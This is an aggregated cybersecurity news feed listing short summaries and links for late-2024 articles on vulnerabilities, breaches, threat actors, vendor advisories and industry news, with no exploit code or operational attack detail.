For an organization to place greater emphasis on software supply chain security, seamless integrations that enhance visibility and streamline workflows remain essential. Sonatype is thrilled to unveil an enhanced integration between Sonatype Lifecycle and GitLab Ultimate, which offers comprehensive vulnerability insights directly within GitLab's native environment.
https://www.sonatype.com/blog/enhance-security-with-the-sonatype-lifecycle-and-gitlab-ultimate-integration
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

From Naptime to Big Sleep: Using Large Language Models To Catch Vulnerabilities In Real-World Code
Posted by the Big Sleep team Introduction In our previous post, Project Naptime: Evaluating Offensive Security Capabilities of Large Language Models, we introduced our framework for large-language-model-assisted vulnerability research and demonstrated its potential by improving the state-of-the-art performance on Meta's CyberSecEval2 benchmarks. Since then, Naptime has evolved into Big Sleep, a collaboration between Google Project Zero and Google DeepMind. Today, we're excited to share the first real-world vulnerability discovered by the Big Sleep agent: an exploitable stack buffer underflow in SQLite, a widely used open source database engine. We discovered the vulnerability and reported it to the developers in early October, who fixed it on the same day. Fortunately, we found...
https://googleprojectzero.blogspot.com/2024/10/from-naptime-to-big-sleep.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Stalker Online - 1,385,472 breached accounts
In May 2020, over 1.3M records from the MMO game Stalker Online were breached. The data included email and IP addresses, usernames and hashed passwords.
https://haveibeenpwned.com/PwnedWebsites#StalkerOnline
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Chinese threat actor Storm-0940 uses credentials from password spray attacks from a covert network
Since August 2023, Microsoft has observed intrusion activity targeting and successfully stealing credentials from multiple Microsoft customers that is enabled by highly evasive password spray attacks. Microsoft has linked the source of these password spray attacks to a network of compromised devices we track as CovertNetwork-1658, also known as xlogin and Quad7 (7777). Microsoft is […] The post Chinese threat actor Storm-0940 uses credentials from password spray attacks from a covert network appeared first on Microsoft Security Blog.
https://www.microsoft.com/en-us/security/blog/2024/10/31/chinese-threat-actor-storm-0940-uses-credentials-from-password-spray-attacks-from-a-covert-network/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

​​Microsoft now a Leader in three major analyst reports for SIEM
Microsoft is positioned in the Leaders Category in the 2024 IDC MarketScape for worldwide SIEM for Enterprise—making it the third major analyst report in SIEM to name Microsoft as a Leader. The post ​​Microsoft now a Leader in three major analyst reports for SIEM appeared first on Microsoft Security Blog.
https://techcommunity.microsoft.com/t5/security-compliance-and-identity/microsoft-now-a-leader-in-three-major-analyst-reports-for-siem/ba-p/4278853
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

​​7 cybersecurity trends and tips for small and medium businesses to stay protected
The challenges that small and midsize businesses (SMBs) face when it comes to security continue to increase as it becomes more difficult to keep up with sophisticated cyberthreats with limited resources or security expertise. Research conducted highlights the top seven SMB cybersecurity trends and steps that can be taken to stay protected.​ The post ​​7 cybersecurity trends and tips for small and medium businesses to stay protected appeared first on Microsoft Security Blog.
https://www.microsoft.com/en-us/security/blog/2024/10/31/7-cybersecurity-trends-and-tips-for-small-and-medium-businesses-to-stay-protected/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Loose-lipped neural networks and lazy scammers
Scammers use large language models (LLMs) to create phishing pages and leave artifacts in texts and tags, like the phrase "As an AI language model...".
https://securelist.com/llm-phish-blunders/114367/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Lottie Player compromised in supply chain attack — all you need to know
Popular JavaScript library and npm package Lottie Player was compromised in a supply chain attack with threat actors releasing three new versions of the component yesterday, all in a span of a few hours. Intel from a leading web3 anti-scam platform suggests, at least one user may have lost more than 3,000 (10 BTC) after falling victim to a phishing transaction associated with the attack. Understand what this threat means for your business and what you need to do.
https://www.sonatype.com/blog/lottie-player-compromised-in-supply-chain-attack-all-you-need-to-know
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

TNAFlix - 1,374,344 breached accounts
In June 2022, the adult website TNAFlix suffered a data breach that was later redistributed as part of a larger corpus of data. The data included 1.4M records of email and IP addresses, usernames and plain text passwords.
https://haveibeenpwned.com/PwnedWebsites#TNAFlix
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Who Should Own AI Risk at Your Organization?
Explore who is and should be accountable for AI risk within organizations and how to empower them to take this significant responsibility.
https://www.hackerone.com/ai/who-owns-ai-risk
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

The evolution of open source risk: Persistent challenges in software security
As organizations increasingly rely on open source software, associated security risks grow, demanding more robust and proactive risk management.
https://www.sonatype.com/blog/the-evolution-of-open-source-risk-persistent-challenges-in-software-security
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Microsoft Ignite: Sessions and demos to improve your security strategy
Join us at Microsoft Ignite 2024 for sessions, keynotes, and networking aimed at giving you tools and strategies to put security first in your organization. The post Microsoft Ignite: Sessions and demos to improve your security strategy appeared first on Microsoft Security Blog.
https://www.microsoft.com/en-us/security/blog/2024/10/30/microsoft-ignite-sessions-and-demos-to-improve-your-security-strategy/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Change Healthcare Breach Hits 100M Americans
Change Healthcare says it has notified approximately 100 million Americans that their personal, financial and healthcare records may have been stolen in a February 2024 ransomware attack that caused the largest ever known data breach of protected health information.
https://krebsonsecurity.com/2024/10/change-healthcare-breach-hits-100m-americans/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

The Karma connection in Chrome Web Store
Somebody brought to my attention that the Hide YouTube Shorts extension for Chrome changed hands and turned malicious. I looked into it and could confirm that it contained two undisclosed components: one performing affiliate fraud and the other sending users' every move to some Amazon cloud server. But that wasn't all of it: I discovered eleven more extensions written by the same people. Some contained only the affiliate fraud component, some only the user tracking, some both. A few don't appear to be malicious yet. While most of these extensions were supposedly developed or bought by a person without any other traces online, one broke this pattern. Karma shopping assistant has been on Chrome Web Store since 2020, the company behind it founded in 2013. This company employs more than...
https://palant.info/2024/10/30/the-karma-connection-in-chrome-web-store/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Unmasking the SYS01 Infostealer Threat: Bitdefender Labs Tracks Global Malvertising Campaign Targeting Meta Business Pages
In a world ran by advertising, businesses and organizations are not the only ones using this powerful tool. Cybercriminals have a knack for exploiting the engine that powers online platforms by corrupting the vast reach of advertising to distribute malware en masse. While legitimate businesses rely on ads to reach new audiences, hackers exploit these platforms to trick users into downloading harmful software. Malicious ads often seem to promote legitimate software, streaming services, or produc
https://www.bitdefender.com/en-us/blog/labs/unmasking-the-sys01-infostealer-threat-bitdefender-labs-tracks-global-malvertising-campaign-targeting-meta-business-pages/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Jumpy Pisces Engages in Play Ransomware
A first-ever collaboration between DPRK-based Jumpy Pisces and Play ransomware signals a possible shift in tactics. The post Jumpy Pisces Engages in Play Ransomware appeared first on Unit 42.
https://unit42.paloaltonetworks.com/north-korean-threat-group-play-ransomware/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Normalyze to be purchased by Proofpoint

https://www.proofpoint.com/us/newsroom/news/normalyze-be-purchased-proofpoint
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Products Of The Year 2024: The Finalists

https://www.proofpoint.com/us/newsroom/news/products-year-2024-finalists
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

VimeWorld - 3,118,964 breached accounts
In October 2018, the Russian Minecraft service VimeWorld suffered a data breach that was later redistributed as part of a larger corpus of data. The data included 3.1M records of usernames, email and IP addresses and passwords stored as either MD5 or bcrypt hashes.
https://haveibeenpwned.com/PwnedWebsites#VimeWorld
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Metabase Information Disclosure Vulnerability (CVE-2021-41277)
What is the attack?FortiGuard Labs observes widespread attack attempts targeting a three-year-old Metabase vulnerability (CVE-2021-41277) detected by more than 30,000 sensors. Successful exploitation could lead to information disclosure including expose server files and environment variables to unauthorized users. The vulnerability occurs due to the use of user-supplied input without proper validation.Metabase is an open-source data analytics platform. According to their website it is used by over 60,000 companies including, Capital One, OpenAI, and more. FortiGuard Recon Threat Intelligence team tracked this vulnerability being targeted by a hacktivist group called GhostSec back in May 2024.What is the recommended Mitigation?This issue is fixed in a new maintenance release (0.40.5 and 1.40.5),...
https://fortiguard.fortinet.com/threat-signal-report/5563
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

PCI DSS Self-Assessment Questionnaires: Choosing the Right Type
If you process credit card payments, you need to prioritize security. One way to guarantee this safety is by complying with Payment Card Industry (PCI) Data Security Standards (DSS).
https://www.legitsecurity.com/blog/pci-dss-self-assessment-questionnaire
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

PCI DSS Compliance Levels and Requirements: A Complete Guide
If your business processes credit card transactions, it needs to meet the Payment Card Industry (PCI) Data Security Standards (DSS).
https://www.legitsecurity.com/blog/pci-dss-compliance-levels
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

What Is Secrets Management? Best Practices and Challenges
Modern apps require hundreds of secrets to function (API keys, cloud credentials, etc.). However, poor management of these secrets can expose sensitive information publicly or to malicious actors.
https://www.legitsecurity.com/blog/what-is-secrets-management
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Cyber Resilience Audit (CRA) scheme launches for assured CAF-based audits
NCSC-assured CRA service now offering Cyber Assessment Framework based audits and more applications invited from potential service providers.
https://www.ncsc.gov.uk/blog-post/cra-scheme-launches
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Risk reduction redefined: How compromise assessment helps strengthen cyberdefenses
Kaspersky experts analyze cyberdefense weak points, including patch management, policy violations and MSSP issues, and real-world cases where compromise assessment helped detect and mitigate incidents.
https://securelist.com/compromise-assessment-cases/114332/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

July 2024 Cyber Attacks Statistics
After the cyber attacks timelines, it's time to publish the statistics for July 2024 where I collected and analyzed 219 events. During July 2024...
https://www.hackmageddon.com/2024/10/29/july-2024-cyber-attacks-statistics/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

The threat from commercial cyber proliferation
Report informing readers about the threat to UK industry and society from commercial cyber tools and services.
https://www.ncsc.gov.uk/report/commercial-cyber-proliferation-assessment
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Cyber Essentials: are there any alternative standards?
Can an equivalent cyber security standard deliver the same outcomes as the NCSC's Cyber Essentials scheme?
https://www.ncsc.gov.uk/blog-post/cyber-essentials-are-there-any-alternative-standards
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Lumma/Amadey: fake CAPTCHAs want to know if you're human
Malicious CAPTCHA distributed through ad networks delivers the Amadey Trojan or the Lumma stealer, which pilfers data from browsers, password managers, and crypto wallets.
https://securelist.com/fake-captcha-delivers-lumma-amadey/114312/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Email, Email on the Wall, Who Sent You, After All?
During Business Email Comproise (BEC) engagements we often have to analyze the provenance of emails. According to the FBI's Internet Crime Report, BEC is one of the most financially damaging attacks, even surpassing ransomware in terms of losses. But how can we know all of this? Through email headers! This blog post tries to shed some light on the information contained within emails, what it means, and what can be done to prevent this type of attack.
https://blog.compass-security.com/2024/10/email-email-on-the-wall-who-sent-you-after-all/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Proofpoint Signs Definitive Agreement to Acquire Normalyze

https://www.proofpoint.com/us/newsroom/press-releases/proofpoint-signs-definitive-agreement-acquire-normalyze
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Proofpoint Expands Data Security With Normalyze Acquisition

https://www.proofpoint.com/us/newsroom/news/proofpoint-expands-data-security-normalyze-acquisition
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Veeam Backup and Replication Deserialization Vulnerability (CVE-2024-40711)
What is the Vulnerability?CVE-2024-40711 is a critical unauthenticated Remote Code Execution (RCE) vulnerability in Veeam Backup & Replication software. Threat actors could execute arbitrary code on a vulnerable system without authentication, which poses a significant risk to organizations using Veeam for backup and data protection. The vulnerability has been added to Known Exploited Vulnerabilities Catalog (KEV) on October 17, 2024, and is known to be used in Ransomware Campaigns.What is the recommended Mitigation?Veeam has released security patches addressing CVE-2024-40711, along with 5 other lower severity vulnerabilities in Veeam Backup & Replication. https://www.veeam.com/kb4649What FortiGuard Coverage is available?FortiGuard recommends users to apply the patch provided by the vendor...
https://fortiguard.fortinet.com/threat-signal-report/5559
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Staff Stories Spotlight Series: Cybersecurity Awareness Month 2024
This blog is part of a larger NIST series during the month of October for Cybersecurity Awareness Month , called 'Staff Stories Spotlight.' Throughout the month of October this year, Q&A style blogs will be published featuring some of our unique staff members who have interesting backgrounds, stories to tell, and projects in the world of cybersecurity. This year's Cybersecurity Awareness Month theme is ‘Secure our World.' How does this theme resonate with you, as someone working in cybersecurity? For me, this year's theme is a reminder of the global nature of NIST's cybersecurity and privacy
https://www.nist.gov/blogs/cybersecurity-insights/staff-stories-spotlight-series-cybersecurity-awareness-month-2024-3
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Cloud Security Essentials
Cloud security involves employing perimeter defenses like firewalls, IDPSs and VPNs as well as guaranteeing isolation through network segmentation and virtual LANs while monitoring traffic for anomalies and threats –... The post Cloud Security Essentials appeared first on Hacker Combat.
https://www.hackercombat.com/cloud-security/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Antivirus Software
Antivirus software protects devices against viruses, malware, and other cyberthreats by detecting, quarantining, and deleting malicious code. Modern antivirus products also offer additional security features such as password protection, identity... The post Antivirus Software appeared first on Hacker Combat.
https://www.hackercombat.com/antivirus-software/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Three Ways AI Can Hack the U.S. Election
The growing capability of AI content poses three very real threats to modern elections. We explain each, and take a glimpse at a possible solution to the growing AIpocalypse.
https://www.f5.com/labs/articles/cisotociso/three-ways-ai-can-hack-the-us-election
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

StreamCraft - 1,772,620 breached accounts
In July 2020, the Russian Minecraft service StreamCraft suffered a data breach that was later redistributed as part of a larger corpus of data. The data included 1.8M records of usernames, email and IP addresses and passwords stored as either MD5 or bcrypt hashes.
https://haveibeenpwned.com/PwnedWebsites#StreamCraft
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

We're all getting too many political texts. It's not too late to fight back.

https://www.proofpoint.com/us/newsroom/news/were-all-getting-too-many-political-texts-its-not-too-late-fight-back
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

The Windows Registry Adventure #4: Hives and the registry layout
Posted by Mateusz Jurczyk, Google Project Zero To a normal user or even a Win32 application developer, the registry layout may seem simple: there are five root keys that we know from Regedit (abbreviated as HKCR, HKLM, HKCU, HKU and HKCC), and each of them contains a nested tree structure that serves a specific role in the system. But as one tries to dig deeper and understand how the registry really works internally, things may get confusing really fast. What are hives? How do they map or relate to the top-level keys? Why are some HKEY root keys pointing inside of other root keys (e.g. HKCU being located under HKU)? These are all valid questions, but they are difficult to answer without fully understanding the interactions between the user-mode Registry API and the kernel-mode registry...
https://googleprojectzero.blogspot.com/2024/10/the-windows-registry-adventure-4-hives.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

How to Protect Against Ransomware Attacks?
Criminal hackers employ ransomware attacks against their targets by encrypting their data and demanding that a ransom be paid within an allotted timeframe or risk losing it forever. When an... The post How to Protect Against Ransomware Attacks? appeared first on Hacker Combat.
https://www.hackercombat.com/protect-against-ransomware-attacks/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Cybersecurity spotlight on bug bounty researcher @adrianoapj
As we wrap up Cybersecurity Awareness Month, the GitHub Bug Bounty team is excited to feature another spotlight on a talented security researcher who participates in the GitHub Security Bug Bounty Program—@adrianoapj! The post Cybersecurity spotlight on bug bounty researcher @adrianoapj appeared first on The GitHub Blog.
https://github.blog/security/vulnerability-research/cybersecurity-spotlight-on-bug-bounty-researcher-adrianoapj/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

16-31 July 2024 Cyber Attacks Timeline
In the second timeline of July 2024 I collected 116 events (7.25 events/day) with a threat landscape dominated by malware with...
https://www.hackmageddon.com/2024/10/24/16-31-july-2024-cyber-attacks-timeline/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

AWS CDK Bucket Squatting Risk
The AWS Cloud Development Kit (CDK) is a way of deploying infrastructure-as-code. The vulnerability involves AWS CDK's use of a predictable S3 bucket name format (cdk-{Qualifier}-assets-{Account-ID}-{Region}), where the default “random” qualifier (hnb659fds) is common and easily guessed. If an AWS customer deletes this bucket and reuses CDK, an attacker who claims the bucket can inject malicious CloudFormation templates, potentially gaining admin access. Attackers supposedly only need the AWS account ID to prepare the bucket in various regions, exploiting the default naming convention. However, it is important to note that the additional conditions greatly lower the likelihood of exploitation. The victim must use the CDK, having deleted the bucket, and then subsequently attempt to...
https://www.cloudvulndb.org/aws-cdk-squatting
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

The Global Surveillance Free-for-All in Mobile Ad Data
Not long ago, the ability to remotely track someone's daily movements just by knowing their home address, employer, or place of worship was considered a powerful surveillance tool that should only be in the purview of nation states. But a new lawsuit in a likely constitutional battle over a New Jersey privacy law shows that anyone can now access this capability, thanks to a proliferation of commercial services that hoover up the digital exhaust emitted by widely-used mobile apps and websites.
https://krebsonsecurity.com/2024/10/the-global-surveillance-free-for-all-in-mobile-ad-data/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

The Crypto Game of Lazarus APT: Investors vs. Zero-days
Kaspersky GReAT experts break down the new campaign of Lazarus APT which uses social engineering and exploits a zero-day vulnerability in Google Chrome for financial gain.
https://securelist.com/lazarus-apt-steals-crypto-with-a-tank-game/114282/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Deceptive Delight: Jailbreak LLMs Through Camouflage and Distraction
We examine an LLM jailbreaking technique called "Deceptive Delight," a technique that mixes harmful topics with benign ones to trick AIs, with a high success rate. The post Deceptive Delight: Jailbreak LLMs Through Camouflage and Distraction appeared first on Unit 42.
https://unit42.paloaltonetworks.com/jailbreak-llms-through-camouflage-distraction/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Missing authentication in fgfmsd
A missing authentication for critical function vulnerability [CWE-306] in FortiManager fgfmd daemon may allow a remote unauthenticated attacker to execute arbitrary code or commands via specially crafted requests.Reports have shown this vulnerability to be exploited in the wild. Revised on 2024-11-15 00:00:00
https://fortiguard.fortinet.com/psirt/FG-IR-24-423
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

5 new protections on Google Messages to help keep you safe
Posted by Jan Jedrzejowicz, Director of Product, Android and Business Communications; Alberto Pastor Nieto, Sr. Product Manager Google Messages and RCS Spam and Abuse; Stephan Somogyi, Product Lead, User Protection; Branden Archer, Software Engineer Every day, over a billion people use Google Messages to communicate. That's why we've made security a top priority, building in powerful on-device, AI-powered filters and advanced security that protects users from 2 billion suspicious messages a month. With end-to-end encrypted1 RCS conversations, you can communicate privately with other Google Messages RCS users. And we're not stopping there. We're committed to constantly developing new controls and features to make your conversations on Google Messages even more secure and private. As...
http://security.googleblog.com/2024/10/5-new-protections-on-google-messages.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

IoT Assignment Completed! Report on Barriers to U.S. IoT Adoption
The 16 members of the NIST-managed Internet of Things (IoT) Advisory Board have completed their report on barriers to the U.S. receiving the benefits of IoT adoption, along with their recommendations for overcoming those barriers. As Benson Chan (Chair) and Dan Caprio (Vice Chair) of the IoT Advisory Board state in the report: “The United States is in the early stages of a profound transformation, one that is driven by economic, societal, and cultural innovations brought about by the IoT. These innovations intertwine connectivity and digital innovation with the opportunity to drive a
https://www.nist.gov/blogs/cybersecurity-insights/iot-assignment-completed-report-barriers-us-iot-adoption
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Most Political Campaign Texts Aren't Scams, Experts Say

https://www.proofpoint.com/us/newsroom/news/most-political-campaign-texts-arent-scams-experts-say
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Google Chromium in Visuals Use-After-Free Vulnerability (CVE-2024-4671)
What is the Vulnerability?A new zero-day vulnerability has recently been discovered in the Visuals component of Chrome, which is responsible for rendering and displaying web content. This Visuals Use-After-Free Vulnerability tagged as CVE-2024-4671 can cause a browser to crash, execute code, and leak data. According to Google, the vulnerability is being actively exploited and CISA has already added this vulnerability to its known exploited catalog. What is the vendor mitigation?Google released security updates on May 9, 2024 for Windows, MacOS, and Linux affecting the Google Chrome browser. The vendor advises users to ensure that they are running the latest version of their browsers. Also, users of Chromium-based browsers such as Microsoft Edge and Opera are also advised to apply the fixes...
https://fortiguard.fortinet.com/threat-signal-report/5437
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

VMware ESXi Ransomware Attack (CVE-2024-37085)
What is the Attack?Threat actors are exploiting an authentication bypass vulnerability in ESXi hypervisors, known as CVE-2024-37085, to gain full administrative permissions on domain-joined ESXi hypervisors. This flaw allows threat actors to encrypt critical ESXi servers in ransomware attacks. On Monday, July 29, Microsoft published a threat intelligence blog on observed exploitation of CVE-2024-37085. According to the blog, Akira and Black Basta ransomware deployments were found on the impacted servers. The vulnerability has also been added to CISA's Known Exploited Catalog (KEV) list on July 31, 2024.What is the recommended Mitigation?Please go through the vendor provided update to address the security vulnerability. Support Content Notification - Support Portal - Broadcom support portalWhat...
https://fortiguard.fortinet.com/threat-signal-report/5498
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

NextGen Healthcare Mirth Connect RCE (CVE-2023-43208, CVE-2023-37679)
What is the vulnerability?NextGen Healthcare Mirth Connect is vulnerable to unauthenticated remote code execution (CVE-2023-43208) caused due to an incomplete patch of a Command Injection flaw (CVE-2023-37679). Mirth Connect is an open-source data integration platform widely used by healthcare companies. It enables the management of information using bi-directional sending of many types of messages. Attackers could exploit this vulnerability for initial access or to compromise sensitive healthcare data. CISA has recently added CVE-2023-43208 to its Known Exploited Vulnerabilities (KEV) catalog on May 20th, 2024. What is the recommended Mitigation?Users are advised to update to the latest version of NextGen Healthcare Mirth Connect as per the vendor's instructions. What FortiGuard Coverage...
https://fortiguard.fortinet.com/threat-signal-report/5460
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Oracle WebLogic Server Vulnerabilities (CVE-2023-21839, CVE-2017-3506)
What is the attack?A threat actor known as Water Sigbin (aka the 8220 Gang) is seen exploiting two vulnerabilities in the Oracle WebLogic server: CVE-2017-3506, which allows remote OS command execution, and CVE-2023-21839 is an insecure deserialization vulnerability. CISA recently added the Oracle WebLogic flaw tracked as CVE-2017-3506 to its known exploited vulnerabilities catalog on 3 June 2023.What is the recommended Mitigation?Apply the most recent patch released by Oracle. In the advisory, Oracle mentioned that they continue to receive reports of exploitation attempts.What FortiGuard Coverage is available?FortiGuard customers remain protected by the IPS signatures available for both vulnerabilities. FortiGuard Outbreak Alert is available to review the full coverage. FortiGuard Incident...
https://fortiguard.fortinet.com/threat-signal-report/5466
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

CVE-2024-8901 - missing JWT issuer and signer validation in aws-alb-route-directive-adapter-for-istio
Publication Date: 2024/10/21 4:00 PM PDT The AWS ALB Route Directive Adapter For Istio repo provides an OIDC authentication mechanism that was integrated into the open source Kubeflow project. The adapter uses JWT for authentication, but lacks proper signer and issuer validation. In deployments of ALB that ignore security best practices, where ALB targets are directly exposed to internet traffic, an actor can provide a JWT signed by an untrusted entity in order to spoof OIDC-federated sessions and successfully bypass authentication. Affected versions: v1.0, v1.1 Resolution The repository/package has been deprecated, is End of Life, and is no longer actively supported. Workarounds As a security best practice, ensure that your ELB targets (e.g. EC2 Instances, Fargate...
https://aws.amazon.com/security/security-bulletins/AWS-2024-011/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

CVE-2024-10125 - missing JWT issuer and signer validation in aws-alb-identity-aspnetcore
Publication Date: 2024/10/21 4:00 PM PDT Description: The Amazon.ApplicationLoadBalancer.Identity.AspNetCore repo contains Middleware that can be used in conjunction with the Application Load Balancer (ALB) OpenId Connect integration and can be used in any ASP.NET Core deployment scenario, including AWS Fargate, Amazon Elastic Kubernetes Service (Amazon EKS), Amazon Elastic Container Service (Amazon ECS), Amazon Elastic Compute Cloud (Amazon EC2), and AWS Lambda. In the JWT handling code, it performs signature validation but fails to validate the JWT issuer and signer identity. The signer omission, if combined with a scenario where the infrastructure owner allows internet traffic to the ALB targets (not a recommended configuration), can allow for JWT signing by an untrusted entity...
https://aws.amazon.com/security/security-bulletins/AWS-2024-012/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Continued Intense Scanning From One IP in Lithuania
Plus a few interesting changes in the CVEs we track, and some notes on just what kinds of malware stagers we see.
https://www.f5.com/labs/articles/threat-intelligence/sensor-intel-series-top-cves-september-2024
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Securing the open source supply chain: The essential role of CVEs
Vulnerability data has grown in volume and complexity over the past decade, but open source and programs like the Github Security Lab have helped supply chain security keep pace. The post Securing the open source supply chain: The essential role of CVEs appeared first on The GitHub Blog.
https://github.blog/security/supply-chain-security/securing-the-open-source-supply-chain-the-essential-role-of-cves/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Missing JWT issuer and signer validation in ALB middleware

https://www.cloudvulndb.org/missing-jwt-issuer
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Brazil Arrests ‘USDoD,' Hacker in FBI Infragard Breach
Brazilian authorities reportedly have arrested a 33-year-old man on suspicion of being "USDoD," a prolific cybercriminal who rose to infamy in 2022 after infiltrating the FBI's InfraGard program and leaking contact information for 80,000 members. More recently, USDoD was behind a breach at the consumer data broker National Public Data that led to the leak of Social Security numbers and other personal information for a significant portion of the U.S. population.
https://krebsonsecurity.com/2024/10/brazil-arrests-usdod-hacker-in-fbi-infragard-breach/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Publishers Spotlight: Proofpoint

https://www.proofpoint.com/us/newsroom/news/publishers-spotlight-proofpoint
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Voice  Cloning with Deep Learning Models
Given the explosion of development and interest in deep learning models in the past year, we decided to research on the topic to increase our know-how and find applications where these technologies can be leveraged in offensive security engagements. This posts explores the use of machine learning for voice cloning and how it can be used for social engineering.
https://blog.compass-security.com/2024/10/voice-cloning-with-deep-learning-models/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Abusing AD-DACL : Generic ALL Permissions
In this post, we explore the exploitation of Discretionary Access Control Lists (DACL) using the Generic ALL permission in Active Directory environments. This permission provides The post Abusing AD-DACL : Generic ALL Permissions appeared first on Hacking Articles.
https://www.hackingarticles.in/abusing-ad-dacl-generic-all-permissions/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Sudanese Brothers Arrested in ‘AnonSudan' Takedown
The U.S. government on Wednesday announced the arrest and charging of two Sudanese brothers accused of running Anonymous Sudan (a.k.a. AnonSudan), a cybercrime business known for launching powerful distributed denial-of-service (DDoS) attacks against a range of targets, including dozens of hospitals, news websites and cloud providers. One of the brothers is facing life in prison for allegedly seeking to kill people with his attacks.
https://krebsonsecurity.com/2024/10/sudanese-brothers-arrested-in-anonsudan-takedown/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Gatekeeper Bypass: Uncovering Weaknesses in a macOS Security Mechanism
Explore how macOS Gatekeeper's security could be compromised by third-party apps not enforcing quarantine attributes effectively. The post Gatekeeper Bypass: Uncovering Weaknesses in a macOS Security Mechanism appeared first on Unit 42.
https://unit42.paloaltonetworks.com/gatekeeper-bypass-macos/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Safer with Google: Advancing Memory Safety
Posted by Alex Rebert, Security Foundations, and Chandler Carruth, Jen Engel, Andy Qin, Core Developers Error-prone interactions between software and memory1 are widely understood to create safety issues in software. It is estimated that about 70% of severe vulnerabilities2 in memory-unsafe codebases are due to memory safety bugs. Malicious actors exploit these vulnerabilities and continue to create real-world harm. In 2023, Google's threat intelligence teams conducted an industry-wide study and observed a close to all-time high number of vulnerabilities exploited in the wild. Our internal analysis estimates that 75% of CVEs used in zero-day exploits are memory safety vulnerabilities. At Google, we have been mindful of these issues for over two decades, and are on a journey to continue...
http://security.googleblog.com/2024/10/safer-with-google-advancing-memory.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Bringing new theft protection features to Android users around the world
Posted by Jianing Sandra Guo, Product Manager and Nataliya Stanetsky, Staff Program Manager, Android Janine Roberta Ferreira was driving home from work in São Paulo when she stopped at a traffic light. A man suddenly appeared and broke the window of her unlocked car, grabbing her phone. She struggled with him for a moment before he wrestled the phone away and ran off. The incident left her deeply shaken. Not only was she saddened at the loss of precious data, like pictures of her nephew, but she also felt vulnerable knowing her banking information was on her phone that was just stolen by a thief. Situations like Janine's highlighted the need for a comprehensive solution to phone theft that exceeded existing tools on any platform. Phone theft is a widespread concern in many countries...
http://security.googleblog.com/2024/10/android-theft-protection.html
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Guidance on effective communications in a cyber incident
Supporting organisations of all sizes to manage their communications strategy before, during and after a cyber security incident.
https://www.ncsc.gov.uk/guidance/effective-communications-in-a-cyber-incident
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

H1 2024 Cyber Attacks Statistics
I aggregated the statistics created from the cyber attacks timelines published in the first half of 2024. In this period...
https://www.hackmageddon.com/2024/10/15/h1-2024-cyber-attacks-statistics/
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

Data exfil via VPC endpoint denials in CloudTrail
CloudTrail delivered events to the resource owner and API caller even when the API action was denied by the VPC endpoint policy. This could have enabled a stealthy data exfiltration method in cases where an attacker had previously compromised a VPC, by smuggling data through the user agent field in denied requests.
https://www.cloudvulndb.org/vpc-endpoint-log-data-exfil
Partager : LinkedIn / Twitter / Facebook / View / View (lite)

'PDNS for Schools' to provide cyber resilience for more institutions
The NCSC's ‘Protective Domain Name Service for Schools' scaled-up to protect a wider range of organisations.
